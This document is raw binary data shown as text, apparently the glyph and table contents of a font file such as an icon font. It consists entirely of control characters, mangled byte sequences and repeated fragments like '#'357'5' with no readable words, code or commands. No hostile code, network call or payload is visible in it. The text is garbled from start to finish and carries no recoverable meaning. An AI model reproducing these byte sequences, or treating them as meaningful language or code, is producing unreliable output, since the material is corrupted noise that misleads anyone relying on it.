�7]KO�-	@I��	
&l
>		
|		
	
	"

			.
		g		
$	

	H	

n!	� 	GIdJ
V(V�t
?
(t)*
R
/		6-,&N&I			P%&�
	
u


9	+		��
	
n

.	
	%
	
;			&	
@
	
f	
B

i%



#
d
	?��h)7FUdq����������&5BO\iv����������
%2>JV^jx����������+7@&&'.723%37676&%676&'&37>."#'>?6.>&'&/&&>&'&'767>.'65'4&7>/.'357'5"'7357/4=#'#37'37'5#'#357&'#3?'#37'35#'735#7'5#'357'3'"264&''757'5"+7357/45'7#'#37'367'5#'##37357&7'#37'35#'735#7'7#'757'3'"264&5#'357'"+7357/4'7#'#37'363'5#'##373?'#37'35#'2735#7'5#'357'3'"264&7'357'5"+7357'5'4=#'#37'347'5#'##37357&7'#37'35#'735#7'5#'357'3'"5462'357'5"+7357/4=#'#37'37'5#'##37357"57'#37'35#'5#2735#7#'#357'3'"&5432''4;057'5357'5#'3735#'#737'5#'#57"5'#377#37'35#7'735#7'5#'357'3'"&46326GY		NGf		+$(0a'�e8a &7/�.
B�	('
0

p	
A
�	
	



	:



!	�
		
	

	#	

	
	
/
		
j		
%
	

	
I	
r

"


�
%

|	q		�D!	IL	gM


X)Z�/-
&R
>
		R	''


	s

t	
;
-			&��



2			
4
 

/
	S
		
r	

	.	

	'			=
	
)		
B
			i
	
C


k&


#�(

$�


�
	5��^:Tk����(6DR^kx����������)5AMYbn|����������	!-9B&&'.#72326?>372337676&&76?6&#"7367327>5'&'&7'2?626/&576&/&2?626/&576&'#'&'2?6326/&376&#'&#72?326/76&5'&'2?326/"576&#'&"3'357'5"+7357/&47#'#37'36?'5#'#'37357'&7'#37'35#'735#7'5'357'3'264&"%'357'5"#'7357/&47#'#37'367'5#'#'37357'&7'#37'35#'735#7'5#'357'7'"2>&%'357'5"+7357/4=#'#37'747'5#'##3735?'#37'35#'735#7'5#'357'3'#"432'357'5"+7357/415#'#37'343'5#'##37357&7'##37'35#'35#7'5#2#'"357'3'"&462''357'50+7357/415#'#37'37'5#'##3735?'#37'35#'735#7'5#'357'3'"&462.EW	|LEd
		+$*	<<

	�8'0^&��
D*	�'?'	!$'#!?


�



]		]�=				

	

.	

	

 ��		

		




	
#

	N	




	
5

	
�

!

���B 	GIeJ�& OT(W�
!	�#H;�� 2
?2 /%


�

		��	

	0


		

	

,

K
		
S



"		


,

			0	
L
1
		
-&
#		
f
.��9Zjz���������)7@LZhv����������&2@N\jv���.&'.5736?>372337676&"&?676&#'"363667"&674756'%67676.3726.#'>?36.>&'&'&?>.'6&/4&7>/.'357'5"+7357/4=#'#37'37'5#'##373?'#37'35#'35#7'5##'357'3'264&"%'357'5#'7357/4=#'#37'36?'5#'##3735?'#37'35#'735#7'5#'357'3'"264&%'757'5"+7357/&47#'#37'37'5#'##37357"'7'#37'35#'735#7'5#'#357'3'"&462'357'50+7357/415#'#37'3437'5#'##37357'"7'#37'35#'735#7'5#'357'3'#"432J$V0
�SLn

		//.		BB
�=+3g)��		%&



�CH�		
��;e"
691�12D
�"	)
u	E
	

q





	/


"��







%


P




;

�	'		

��		�$	OP
	nQ		
	�	
`W],_�" #V+
.]+�_[	
w1/:1B	
	]


*




	?		.	'	�i

5



		

		

	S

[

%



1

$

5

T

6

1		)	&.	&����<Zft����������)6?KZhu����������&&'.5723276?>372337676&"&76?6&#'";6"'357'5"+7357/4=#'#37'3767'5#'##37357&7'#37'35#'735#7'5#'357'3'264&"%'357'5"+7357/4=#'#37'367'5#'##373?&7'#37'35#'735#7'5#'357'3'"264&%'357'5"+7357'5'4=#'#37'367'5#'##373?&7'#37'35#'735#7'5#'357'3'"&462'357'50+7357/4=#'#37'37'5#'##37357'"7'#37'35#'735#7'5#'357'3'"42vTl
#�^8_?
		
!6,	4
JI�%0;t/�c

	**3	�Q5	
	
	7

		
			'	� 		+_

!		B�			
		

+	

	

�w



Q'XZ=b<


!	�
	m5i1k�
&#�-[D8�
<		
!		#		
7		

\f*#		7		%;		^		=7				/				
		
		+5	
	
	?��(<\{����*8FS`ly����������(4BP\hq}���������&6BNUam{������&&'.3323737676&'32767'&'&77?4;6/&?6&#'&'02?4326/576#"5'&3721?4325'76&"5'&"'25701325'76#'1""3"+3'.7>>'.3767>'&'65>76'32>5.'&%&67>'#73237>&'757'5"+7357/4=#'#37'347'5#'#357"'#3?'#37'35#'735#7'5#'#357'3'"&4632''357'5"+7357/4=#'#37'367/#'##373?&7'#37'35#'735#7'7#'357'3'"264&5#'357'0+7357/415#'#37'37'5#'##37357"57'#37'35#'735#7'5#'357'3'"&46327'357'50#"517357/415#'#37'3437'5#'##37357"7'#37'35#'2735#7'5#'#357'3'"5462'357'50+7357/415#'#37'37'5#'##3735?'#21#37'35#'5#735#7#'357'3'"&462''357'5357'5#'373015#'#737'5#'#571"5#377#137'35#7'2735#7'5#'1#357'3'"420=W50F		�!B�+	!2�			??�t9:�)4$


, *"%�

&:12'.L(#


$%��		&		�				
E			0				K
	�	
QJ�.23F4	=<�+""		��8'(

,7
2>N}	"1'2-

	$

		,4�!	"			
7		K			(	+E
-		
	G
	
	
a	

]		X	B��$1>M\j{����,:GS`lu����������&6CPYes�����������
".5AO]jv����&&'.32;676&'&2?54/66?6.37654&#""'6?36.76&/&03?67>.'65'4&#27>/."#122'.7>>'.3767>'&'65>36'#32>5.'&%&67>+"32367>4'6257'5"+7357/4=#'#37'34?'5#'#357&5#3?'#37'35#'2735#7'5#'357'3'"&462''6257'5"+7357/&47#'#37'37'5#'##3735?'#37'35#'735#7'5#'357'3'"264&5#'357'0+7357/415#'#37'37'5#'##3735?'#21#37'35#'3735#7'5#'"357'3'#"&46327'357'5"+7357/4=#'#37'3743'5#'##3735?'#37'35#'735#7'5#'#357'3'"&542'357'50+7357/415#'#37'37'5#'##3735?'#37'35#'5#735#7#'357'3'"462''357'5357'501#'373015#'#7343'5#'#57'#377#0137'35#7'30735#7'5#'1"357'3'#'"542
->U5/E		�A�	�&@
47�	+��
	J	
+�;;
i5,%


-!+

#%�

#";13(/T)#


WJ
��

'		�						
C		1		
L	�		
SL�.12E3	
	;<f	
L 73;


	)	��-*

,8
3?P
 #2(4. 

 	&		
-5�"	#		

;				L	

	 		)	,F
-	

	H

c	
c

\

:�X&Qo���������-:GS`mv����������,8ER[gu�����������	$27&&'.7;7676&"#13'.7>>'.3767>'&'65>76'32>'.'&%&67>#"73237>&'6357'5"+7357/4=#'#37'343'5#'#357"5#3?'#37'35#'2735#7'5#'#357'3'"&5436''357'5"'7357/4=#'#37'367/#'##373?&7'#37'35#'735#7'7'357'3'"264&5#'357'0+7357/4=#'#37'3743'5#'##37357"57'#37'35#'735#7'5#'#357'3'"&54327'357'5"+7357/4#7#'#37'343'5#'##37357"7'#37'35#'2735#7'5#'#357'3'"&462'357'5057357/415#'#37'37'5#'##3735?'#37'35#'5#735#7#'#357'3'"462''357'5357'5#'373015#'#73431'5#'#571"5#377#0137'35#7'2735#7'5#'1#357'3'"420=W50F	�!C
�::�)3$


, *"%�
	&902'.L(#

T��		%		�			
E			0				K
	�QJ�.23F4
	
;<f8'(

,62>M}	 "1'2.
	$

		,4�!	"			
:		J			(
		+D
-				G
		d
	

]		X	7���
,:HVcp~���������#1?MYeq}����������+7CP\fr~�������&&'.5723%37>76&'7257'5"+7357/4=#'#37'367'5#'#357&''3?'#37'35#'735#7'5#'357'3'"264&%'6257'5"+7357/45'7#'#37'367'5#'#'37357&7'#37'35#'75'7'7'357'3'"264&5#'357'"+7357/4=#'#37'34?'5#'##3735?'#37'35#'735#7'5#'357'3'"264&7'357'5"'7357/4=#'#37'367'5#'##37357"'7'#37'35#'735#7'5#'357'3'"2654'357'5"'7357/4=#'#37'363'5#'##3735?'#37'35#'5#2735#7#'357'3'#"5462''357'5357'5#'3735#'#737'5#'#57'#377#37'35#7'735#7'5#'357'3'"&542vTl
#�]8_?
		
!6,;0;9S��

						E

	
			'
��


*%
9%},% %X�				


)



�								

-	

	

�
				�

'Q(W[=b<


!841k��

=			?		'#		
8	
$

d

�

8/%J%3
O%}%Q�

.
*�	

	/
				

		
,
	�!
		
		
�!

���.;HUbq�����"2>4..3?>2?>.'26=.""2675.%2>&#&"3%&";2>&%27676.&'&72>&26/.32>&'&/&&6?6&%.>56'&�@m?>l�l@?k��%
[�[
,2	���53(35
c��$	�.(	
T��
(
3�:


0
�
0
2+	
 M?k�l@?l�k@��	
5
5	qcc��dc�C�<
, �v1
�!W

�"
	�]
T
V

*
8	��+9FTaq�"!654.32?67>.'26=4&"2;2>&'#%;2>&'#"'27676.'26'&'.32>&'&'&&'&'#1"/>/&"#1&/&'&'#7676276227>76&�3V3q2U�	'	

2���(R ORZ��.
.
�6!
&<	$
;&
#5)=,8�87�7+=*2U3	
3U3KYNO��0	
	&#

.

.Q��5		
MM
5()2112)(	��+:HUbr�"!654.32767>.'26=4&"2;2>&#&"%;2>&#&"'2?6.'26'&'.32>&'&'&&&'&""'&"'&'&3676?6712#"2?6&+6763136767>�3V3q2U�	0	

)���()) O*(Z*� �.
.�)=+7�88�8,=)6!
%	<	$
;	&
!62U2
	3U2J
YOO��H	
	&#

'

.R
��)2112)(5LL
5(	���$4FXds��&367>.>'&'&6?>7&'&&3?676&&'&656'&%26.+"3%"#";2>&%>=6'4&".6=6'4�7c 6.076c 5^��	=>1�2&u	 �i%1	n	�n
 
6���,II
��F3/5/0pc 4.1qb=?<	0&2&u!��%0o				m


8�:�
c 

�	�
�
1@!
���&4BSbs�����5.#"3275676.32767>26=4&""26=4&%2>&#&"37326/&'.32>&'&'&&6?6&4'&'&#"34&'&#"327>54&".547476767674767>32'7>'4&�V0?i>=i>.(��1
5#�
��
33
 �%

�&
&/
�
 
0�3<&)	-L-9L-z0	
(=
�"%=j|i?0!
�a01��01a� *

!"Z
�h6

S�	��[0(��
+
-L,\<-M�0
r
6��,=v%
*		����/<L\kx���&&'.31723%37>76&676.?67>.#'676?6.>&'&'&&>&'&'767>.'6/.7>'&'.vTl
#�]8_?
		"5/
;0;9S�Dt&$=A8�			9M
��
c
0
4
�	
L
	


Q'XZ=b<


"841k'
95B8$J
	j
//


�


�
G

6	
		
��l#A&767676&#'"7232667#&%"&767676&#&736#&�	PP
a	$/2	%"w�:R`
`& !	�19�#E0

��
	P���UR�+
F�	8p@b��������#5@DHLN&'&'#"36'&'"4?6'&'&/'&'.76?&'.767>7&#'&'&'&67676?67"7676767>'&'&'&'7676767676?65713'&'&'27676767&67&'&'&'&'&/'"'&#76767&'676'&'""'#76767>'"#7676'67501"301#1�-QxM8
	 1C


(
 #


8*('
	
"

),4$ %3$K3m�dOD9IW%�qh5.F@	)$+2'0,8]>
;_);ZUM=3?1#0e3O@U3"��'N
.j>kNSn3�")"+9OA'�'O.		#9�?Y$)7,
 $$

)7!�
	4DY�C�;"	

$
"!


	 "(

#

	!$	*
&� 	


%7L!"
$
4� 
��			
=
L


!/~G���3S&'&'"=4#"#7>6767>76&'65&&'&?54&'1"7>'.u2}Ue	�n^'k2*��
t^�
,?2

)@#*5
��L4*		�m�(Z?	`pooob$0'59ZB��	
 /& �	
�CF7
F.	����O&#""'.#"".54622654&'&#""'.#"&7>76726=4623�"/&<<&.# 7@7 '8&"/%<<%1 oVYhhYVo^	
��!9""9!((	
		\�/1

1/�]
���<Vn���&'&'.+;'7676#"767#;'7676&#"?#"3!26&767676.'7>27>'&/.676767676'.776676.626'.{�L0	  <)4!B		0L��
�6
	
:?+ "'#�	#10�*		69

O(V�QQ	T )0\ (Q	QQ�V�
D-O03#+�')		


(a
	//!-�
/
�IK��67627622762676276&'&'&'#.'#"&'&'#&'&'&'#&'.'#.'#''.'#&'&'&'#7676227622762276276&&'.'#'.'#''.'#&'&'&'#767627622762676276&m0 +c,+c++d+!/!
)

/*

	&)&	.		


*
=
	.*
%
*-
		(."+d+)g)+d+$, 
	.
%
.

'."+c,)g)+d+$, � &&&&&& (')


(i'	(#$(
	
(!&&&&&&!�
'	(#%(
	)!&&%%&&!�\&��27>764&'&'&"762#"&4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�!
)"-
0	
�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G K A/
@�&)	
'Q�	!			"T2< .



	"?rN4R*

-0G
					�\��35#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�0H�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"3�0��	!			"T2< .



	"?rN4R*

-0G
					�\.��35#32767>4&'&'&"762#"'&4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�0HX+


#-1	
�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"6�0�

3A1

	@�('
P�	!			"T2< .



	"?rN4R*

-0G
					�]��35#335#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�0HT0H�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G 7�0��0��	!			"T2< .



	"?rN4R*

-0G
					�]8��35#3#546?676;27>4'.'&+32+"3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�0H�r
VV�""' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"7�0�0
HV	!			"T2< .



	"?rN4R*

-0G
					�\2��#546?676;27>4'.'&+32+"3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&Sr

VV
�S"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"c0
HS	!			"T2< .



	"?rN4R*

-0G
					�\3��>7654'&'6764'.'&+32+32+32&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&-




``BB``
�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G";



0
0
0V	!			"T2< .



	"?rN4R*

-0G
					�\
��3535#5##7#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&11B0x�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"300xx���	!			"T2< .



	"?rN4R*

-0G
					�\"��67>4&'&'&+735#32+32&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&.
,i�a
aa�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"8

$)1�
0S	!			"T2< .



	"?rN4R*

-0G
					�\#8��27>54.#"6?>7#7>762"'&'.&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�
#%
 	A
)		
�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"R
&

	

 G


�	!			"T2< .



	"?rN4R*

-0G
					�\��37#3&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�3S�g�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"6�0��	!			"T2< .



	"?rN4R*

-0G
					�\6Pi�26767654'&'.'767675654&'&'&"76?6762#"'.46?6762".'&56&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�$%%
		2
	
	
�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G"L


					�



a	
�	!			"T2< .



	"?rN4R*

-0G
					�\*@��32?6736?67>54'&'&'&"7>2#"/&/.4&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�


	A	

+	
&


�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G �$

I	

�	!			"T2< .



	"?rN4R*

-0G
					�\}�%&#&'&"'&'&&'&756&.'&676&'.76>&'&7676&#"3276267627667627627626"'&"'./&"#&3276267627>76'&�"' 
'*bBK1

5kXS<&

!!=!C F@=D%
�C1				  = G �	!			"T2< .



	"?rN4R*

-0G
					�`2Uo�&#%"3!32".7>>'&'&767>'.'276.'&26?># '"3!2"+"!26'.%&'&6?67>+";237>���	
Y�*=-# 6

.!)$#9�K"$$?		
'(*����QR�
R		%"
+&	!
c
	:#e	;*#/#!$B
@#/@+;=0	
"%
' `

	&�'	(#/
�W(1:CLU^���&#&'.323737>&"&462"&462"&462"&462'"&4627"&4627"#3'.7>>'.3767>'&'65>76'32>'.'&%&67>#'#"73727>&-<T4/D	
	� .���G=	
K��:;�)4$

- +	#%�	&;02'/O'#

&!�-11E2		9;�

O				M^8()
+82?M	"1(3.

	%
	
		,4��%9[|����7Y%676&'&&'.32;232767'&'&772?4326/&?6&#"/&2?4326/&?6&#"/&'02?432/76&'&721?0325'76&#'&"3'21257013251'76&#'4"3"+362'.7>>'.3767>'&'65>36#372>5.'&&#!"3!232>&%&67>+"73727>&�B0=W50F	
	�4e,	!2�					??�t9:4E")4$


, *"%�

-
12'.	��


 T(#


T!�=<.24F4	
+)!#b		Z		��8()
	+72?N}	 "1'2-
�


*"�	%		
		,4	�U$2=KWe���&&'.32;676&&?676547&?654732?6'."7676&%327676.%"#132'.7>>'.3767>'&'674636'32>5.'&%&67>'#"737>&0;U40E		�@�u	$
�+	,I
		9	
C	��
	�::�+$

, +

#$�	
&:12'/N&#
	$&!#�-13E4	
	;;�	$

,	+
8
	!

,)

+8	
2>N}
#1(2-

	%	
			,4
��'4CRar�����$%676&'&1&'.32;66?6.37654&#""'6?36.&>&/2>&'&'&03?67>.'65'4&#27>/."#122'.7>>'.3767>'&'65>36'#32>5.'&&#!"7!232>&%&67>+"32367>4�B->U5/E		� �&@
47�	+3
�
	�
	J	
+�;;
i5,%


-!+

#%�

#";13(/��	


![)#


WJ
�;;.12E3	
	; 73;

fa
)	��-*

,8
3?P
 #2(4. 

�


*#� 	&		
-5	�W6R^l{����&1&'.5736?>372337676&"&76?6&#'"636767&?65677676&0#7676&%?676.%"#132'.7>>'.3>7>'&'67>36#32>'.'&%&7>+"73237>&->V40E	))Y'!B
�
4/�	$

5�
=	��		�:;�*$	
, +#%�


-:12(/P'#	
V�.13E3	
	
j6:<q
g5>JB"Q	$

5
	
&


	}-)

,8
2?O~	 "2(3.

	&
		,5�W6R~��&1&'.5736?>372337676&"&76?6&#'"636767%"#132'.7>>'.3>7>'&'67>36#32>'.'&%&7>+"73237>&->V40E	))Y'!B
�
4/5:;�*$	
, +#%�


-:12(/P'#	
V�.13E3	
	
j6:<q
g5>JB"-)

,8
2?O~	 "2(3.

	&
		,5�X&Ss��676&'&&'.3237%"#122'.7>>'.3767>'&'67>36'372>5.'&&#&"73723>&%.67>#&73727>&�A
->U50E		�(;<
j5,%
 
-!-
#'�
	&
23(0	�@ 
��


 \
"$

'&"	,;<-13F3	
	
6-*

,8
3@O�
 #2(4. 

�	+#�&
	
	
	-5����R&'&7676=#54.#5474&#&'&5&7>/.7>7676r#:+A)9$.-2,%_'0\Dgd+@M"�]ci^�36fA2	9	=TO�:%*
3uf
eA!
+%y'��>_��]	99�VZT\�!#
iRTd���o
)7AKU&#!!>7&=6767676'&7>"#+532+532+532����h
!*
�0"�))))))��#��		
)8$#	5"�	 k�y��y��y
����)5"276764'&'&"'&'&476762276764'&'&�wfc9<<9cf�fc:<<:cfwiYX3443XY�YX3443XYi[NL-..-LN<:cf�fc:<<:cf�fc:<��43XY�YX3443XY�YX34�`.-LN�NL-.��~-=%4/&'&'.'&'&'&'.5.!4#";26?6&}
='+A/(_.'"3���^=NLL<F*.&
Y7�cD:0!++U0	0��|O]%'.33264&#"#5>54."#&#"3273&'&'7>/&?27676"&'&5462x(�")-5M""M'2%?J?&2'M
""
M6,)"�'&0HY�YG2%��"b�	
y
#	s	!0"	(G,%?%%?%,G(	"0!	��
#y
	�F*55)G%
����
,"'3!265#!"&=463!234&#!"3!53����(#�
#8�9��A��FF�##y--���Ym&'.76?676?67'&'&'.'&76767676'&'&7676776767>&'&767>7632�#"k�H��v		#$l�I$#	
!T25e%'3-+IG^{�1$	%+$2902@" 2&)F;2/ �t	
+- 
�Q=:Ik�Y[V^=@O
,`DNHK:9*'	hp%V$&,M
St@+6	!""20|�#+#" ��>cg#"&'.547>32"&5#267>54.#"#"3!265#!"&546;#3#3#3#!5>7!!�3,'+ %
3(>�

�
�@̂�����
*�, 5�n,����3'O	&��*��
'O34'
�/

��
� C - #	 #� ��+AV\&"27676'&%+;2654&&"27676&&"27>&%;,
ij
S�Q{

��
�	�BC
<*�
 ���
s��uVwrsuB
u���KO
M�L
@VQ�'
$\$
$^^'��
���
��(Q"76?6"7676763276?>/&76763276?6/&76'4?>'&/.#'&'&?6'&'#&#&"/./4"&'&'&676%6?2/."/&'&?6'&'41#&"#&'#&/'&'&"37672"3?632?>/4?676?/&574&'&676#".'&6?>/&"3276?>/.C:
(1%


;4).&3
:

/
c

$
!+%"'#j$$�02DyZ2I,>Hr�VD982+&m5	99

&!


<
1)/1	
-	
�	"&"+
%
$

)"*)%#��6c@\�?85��MR~E"7��L3%"?66%"/&#'./&/37232672?6376?6?6?6?6/&/4/&/&#'&/&"#"Fs
6	6J8	l
��06
v

n9�.	
6-
0
6
.	.	
6	00

6
	.,.

x�Q�.	��
R
6
	.		.	8006
.-
6

0���j�PDLU���.'#'.54&'##&#"65>367676767676'4'%4>2&264&%###&'.'&'#&/%39?67676765659#�B2uD9�(?8+9AK^Ti	 . PHL:B1�u)GSG)�#�K~�
		�{LVW�:3B
8D0'
	D<LW&; 
$ 
$3		
.9"C34�('1$#3$WDT		TD��
	##
����!%)34&+&/."#"!%67>2!!!7!#!"&?!r AOeme'(@ ���	NWO

�����" �@ (J )<!! (!^�
���>3d## ��� +."2>7654&54>32#"'�"t��RPu"##%7;PR��t"#�J3S�T\NrRs?ZO�1QuF#"vQO�OT8;"#FuQO[X��M\T�T4��:R22�NZ@�{3#3#3#3#3#3#3#3#?bb�cc�11322W11�22W����{��:��:��:��:��:��:��:�����:JZj3!26=4&+'&54&+""&54&+""&54&+"+"32+"&=4632+"&546546;2+"&h	�

#	�

�
	�
	4	


�

�		�	�		�	9		


��				��		�

�p
.	Y

Z	��	��			�T

T

��?O_o76&/&#!"&/.+";23!267>;26=4&+"&#"&/&6;23#"&=46;23#"&=46;2>/m
��
m/>z?
6	$	5	?		{�A 	A	�A	A� @	K'��'K	d��	`d	�T�������9/#"&=4&#!"3!26=46;26=6&#!"&5463!2�2��1���z�|�a{{��9/AO`#"&=4&#!"3!26=46;26=6&#!"&5463!2&/.+;272'%.+;25%#"33726=4&�2��1���z�"4�i���b�
c�
i>�|�a{{��#Eg�������9/AO#"&=4&#!"3!26=46;26=6&#!"&5463!2&/.+;272'%.+;25�2��1���z�"4�i���b�
�|�a{{��#Eg����9/=#"&=4&#!"3!26=46;26=6&#!"&5463!2.+;25�2��1���z�b�
�|�a{{����:09BKT]f#!"&54743#"&46;2!&=&546;2+%462"&7264&"7462"&7264&"'462"&7264&"9'��'�3k�o
3

���

c



L

		
''�
����.��)�	



		



	G
			��X?amy"'&'&'&'&'&'&'&'4&327676767676&'&'&'&'&&'&76767>3264&+"!3264&+"B

,#%"'
	->f)()K;4 

�!
		
"��**
Z**
�hPo*<+	
	$#
.7($F$hg�k�3 ZOqeeVL��

"	��t"45>!#5!#32362!'46;#?!"H�&G6
�F^|? ���"m�B
!��䘘�#[f"�
���1CPYfu����.7'763276?637676767>'4'."27>%4632".74&62?64&"'2326?6.37>.264/&"23>/.2>&/&�$ 
#3F
��"-Z-/
	
TA7�+*��HF)+QFH�IGS�_>-21;2�))�`	`	
	EY
��
`
�	
	:	T
J!#J.ETT'+	KA^&IVHFQ*(FG��),*(�R.@1;20 (,b
c
U
T		
c
Y	T
T-���<K[p����&'&'&'&276761+";2;2654;2654&#!"&'462+"&&6?6&'7'&'&57>/.+"&5'46;2?6;2&/&6?62;2'#'"&'"/&5'546;26'576;2#&/&6;2+"&�
&6$	(	)
�
)��)
<;]
	E	
&	*)
	'&/

	���j<.
"*5�h���T-�;H(		
	E	�3B	�7 
	9
B
}"O��t.7@IMt��!#>32#"&'!.54>2!>?."&462264&"4&"26!'#"!'5&'&+'7>5'!;?>54'.#"26'"'5#/&'476?32654&/&'.5467562'&#&#")��!
*'88'*
"%+F)2TcT1(G+ +I8N88N8�,,�,,�k		�@���*38**273

&


B'n8N7n 	?`8=h==h=7`@	=)�'77N88',,3��,�	���E&N65DLE3W 	


��:	)9M3!267!46;2+"&546;2+"&546;2+"&5#54&+"#"!54&����t}

}Ⱦ���-l�

��

c

��

c

��

�$$WW,��M&6@QZju���������%/BM`iv���������
����.#"2>54"&4625#6?677.#"2>54"&47627.#"267654"&4627.#"2>54"&476325#6?677.#"3267654"&476325#6?675#6767267654'.'&#"7632"&45#6?67.'&#"32767654"&4625#6?677.'&#"32767654"&4762654'.'&#"326"&47622767654'.#"562"&45#6?6775#6?675#67677654'.#"326"&47625#67675#67673276764.#"72"&465#6?677276764.#"72"&46!"&=2?6735#53267654&/&'&#"52?35#526764.#"576735#5463!2676735'&'&"27634&/.#!"3!&62"&462"&4"&4762#'5676/&#"#/&'&+"#&#"32?;276?32?6'&/?>=4'&"&4621

E		g	

U	

U	

	��
g	
	D	L	J

	

	l��

D
g	

S	
	

B	l	M	�Y		e	

P	L	�	



`
-


_��
	
			

s
	

-

Y
"�dv��$:
&%' 
&$&"	�##1""�
./1a	LG
+/	..
+/..
+/	.�aKF

	+/	0aKa	L

R0/Ga
K\	-/aLG	*/	0	/	3
	
R./GaLaL�`	K	


/	0`	Ka	LV



3/XbLL


0/w
AK`\	
	tKa\	
�Ka
KP4
!
 
�_$g��-./5./8/	.��				$		$X".#"0!	�z%2>GU`o|�&'&'&'&76?677676&".4>2462"&5.>2.>676.'6.366&>&6.v6Z7B#:>(+)#6/M9T0k3	 QuAn!�_(C)(DPE('E�


$�(D'*EPC')D�
24!�	
#31�	ZG3�q
[G7�9U2	50Id/J&a>>
i3^�(EPC)(CQD)d

@�$%h*EPD&)D')E'�	+$+
�4H[
/F[	���3?K'."/&"2?626?64/&4?64'&=46&=46��
����
����,,4,,.������������4-,o�--p-��:+e}2=4&+&7?>/&"'?>/.5#67676'&'./&'&'&#2767654'."&>76767>�--l#$4
fQ	#0

/ 
a@f,,IL�LI,,e�3)
*<�

#�? 



	


/>\=@GXMI+--+IMXG@=[�� '

5 -��?62654&#!"�	��	
�	���	��	J	

��
'97%2?34&'&'%6%&/&27%>574&�S8e��E4��8�S��e8X��47>��?B~�B�
��?� ~
�:B���
"&%#5!3!26=!!54&'!#"!54&!#53L�����5�����k�����P��XW��G����#;?CG'/"/6?>&77/.?>7/&7'7/7RA�B	�5)�A�CC5��@?NO��

&
(�A�F<&!�%fB9K�O���A�)4�	B�5CC�00 �<�'@�>�"AE<��E%,����7K7!2767676?'&'&/&'&'.7>767>7>76?!%&'&#!"3!27>U
'
R#/�\ !6GK`	��U 	�
!�[H���	,l�(.#T&(		
*�)2a!��<,r�����363!2676?'"'&'&'&'.7>727>76?!7>&'&7632?6767>676>76&'&&'&'&&'&'&&'&#!"3!276'264&72.46264&72&>�,#EN	%sC	Q�		�� 
#I*6@+
!#:>20 	2j��	3
`*+:++"�� ,

����	
 "Pi	!z>?�
		*0H:/;%&
5
17�*=++;+s"#> **J
����!FQ3264&#!";3!26532676'&'&'%&'&"&=&'&"&5&'#5!'&'5�		��		6U5'
74C��"	
(�2&+1>.*)�

�)a+',*$8	�

�

	��			����#'#;�����&'&/7676'.7676'.76763264&&"'&'&'&32'&?>?676546;267676?>/&'./76=4&'%+"&=46;2�]\Z+

C'

6

'C
+�9.
\]	�
].&S		+
+		S&.0

	��



-.(<	U
:817717:

[	% .-
		I')~
<g2	,?K��?,	2g<A ++@		

�

4

��*!3!33#3##535#53#535#53*��"("��rr�sssssss�rrrrI��#��rs��s+r��s�s���'3?N\nw���26=4&"32>/.'&3276&#";264&!#";264&'.32?>'32?6.26?6=4&""264&763267676'&'&'&&'&'.>&#&67>'&�

�	

K..>44

�55

-..�	

�
"" RVg
:E,"1 �32KOm99:*1wJ8_80o
&
99�6

6&	/�
	�


�	S	//��		`//�! irWT�5!#_�SCA�  ).��Q@j?5[�
���,4'&'&'&'.;2>5#";26=4&�
'
!,*
�	
�	

	�

�8:.:4D$JdJ�{1
	i

	h	
��7GXlz673?6767>'&/&'&6"7&'&#"7>'<&3676&'&'67676?6'&7>.C

/T0i	
&4H*#^$1
!e		(	N"i'%
		M	

#
/\
	
9�
3i4Q
��
���� 
+

����}&#'"'.'67'&'&>7676''.'&7676&67>'".7>&'&>767%62?67z	2a��mF! 13QN��-* UWvDqD('DFPvMI=]B2#!	LYS>>+6 *B$!!!#%$R/'
%!�
X9RP�IL)'ZKFQOF0(sKN	HsEPFC&'	[	/H.SY(&,"# Q'(+2!7%:	! 	�

���AQaq������4.+"&=6'4.+"&=6.'&+"3!2654&+"&#"&=46;2'#"&=46;2'#"&=46;2#"&=46;27+"&=47325+"&=46;232+"&=46#"&=46;2#"&=46;2�"";##<�T��c����������
��0��������#
!
%	������������Z����6�������������)6!54&+"#"3!2656&"&'&54>2'".4>32���	�LB
